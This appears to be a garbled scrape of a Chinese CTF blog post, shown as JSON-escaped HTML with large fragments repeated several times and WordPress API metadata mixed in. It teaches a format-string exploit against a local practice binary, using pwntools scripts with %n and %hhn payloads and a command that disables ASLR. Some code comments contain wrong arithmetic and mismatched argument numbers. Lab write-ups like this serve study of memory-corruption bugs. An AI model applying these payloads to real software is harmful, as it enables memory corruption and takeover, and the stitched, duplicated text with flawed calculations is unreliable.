c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
echo 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space<\/pre>\n\n\n\n\u8fdb\u5165a == 0x10<\/h3>\n\n\n\n\u9700\u8981\u786e\u5b9a\u4e24\u70b9\uff1aa\u7684\u5730\u5740\uff0ca\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\na\u7684\u5730\u5740\u53ef\u901a\u8fc7gdb\u8c03\u8bd5\u7a0b\u5e8f\u6765\u83b7\u53d6\uff0c\u5177\u4f53\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\nb vulnfunc<\/p>\n\n\n\nr<\/p>\n\n\n\ndisassemble<\/p>\n\n\n\n\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\nc<\/p>\n\n\n\nx\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u9700\u8981\u786e\u5b9a\u4e24\u70b9\uff1aa\u7684\u5730\u5740\uff0ca\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\n
a\u7684\u5730\u5740\u53ef\u901a\u8fc7gdb\u8c03\u8bd5\u7a0b\u5e8f\u6765\u83b7\u53d6\uff0c\u5177\u4f53\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\nb vulnfunc<\/p>\n\n\n\nr<\/p>\n\n\n\ndisassemble<\/p>\n\n\n\n\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\nc<\/p>\n\n\n\nx\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php